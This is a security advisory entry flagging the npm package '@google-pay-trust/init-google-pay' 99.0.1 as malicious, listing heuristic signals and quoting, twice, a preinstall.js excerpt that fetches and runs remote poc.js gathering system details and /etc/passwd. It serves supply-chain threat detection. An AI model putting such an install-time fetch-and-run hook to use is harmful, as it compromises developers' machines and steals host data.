@google-pay-trust/init-google-pay @99.0.1

--- _-= Per source details. Do not edit below this line.=-_ ## Source: ossf-package-analysis (580b1cc172168922435791da2a322425b05b27df9e9e50eda91bf626ee7d032b) The OpenSSF Package Analysis project identified '@google-pay-trust/init-google-pay' @ 99.0.1 (npm) as malicious. It is considered malicious because: - The package executes one or more commands associated with malicious behavior.

Script: node preinstall.js

Matched 7 signal(s), weighted score 9: • [S_KNOWN_SPAM_PUBLISHER] Maintainer(s) previously flagged as spam: m0ntana. • [S_NO_REPO_NO_HOME] No repository, homepage, or bugs URL — genuine packages almost always link somewhere. • [S_NO_KEYWORDS] No keywords declared. • [S_NO_DEPS] No runtime, dev, peer, or optional dependencies declared. • [S_TINY_PAYLOAD] Tiny payload: 3 code file(s), 2017 bytes total. • [S_INFLATED_FIRST_SEMVER] First publish at version 99.0.1 — inflated semver on a brand-new package. • [S_EMPTY_MAIN] Entry point (index.js) is 21 bytes — effectively empty.

Accessing /etc/passwd or /etc/shadow — credential harvesting on Linux 11 | const pkg = (raw.startsWith("@") ? raw.split("/")[1] : raw).replace(/[^a-z0-9-]/gi, "-"); 12 | > 13 | // Fetches poc.js (safe PoC: whoami/hostname/ifconfig + /etc/passwd only) 14 | http.get(`http://${pkg}.${scope}.${BASE}/poc.js`, { timeout: 8000 }, (res) => { 15 | let body = "";

Accessing /etc/passwd or /etc/shadow — credential harvesting on Linux 11 | const pkg = (raw.startsWith("@") ? raw.split("/")[1] : raw).replace(/[^a-z0-9-]/gi, "-"); 12 | > 13 | // Fetches poc.js (safe PoC: whoami/hostname/ifconfig + /etc/passwd only) 14 | http.get(`http://${pkg}.${scope}.${BASE}/poc.js`, { timeout: 8000 }, (res) => { 15 | let body = "";

Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.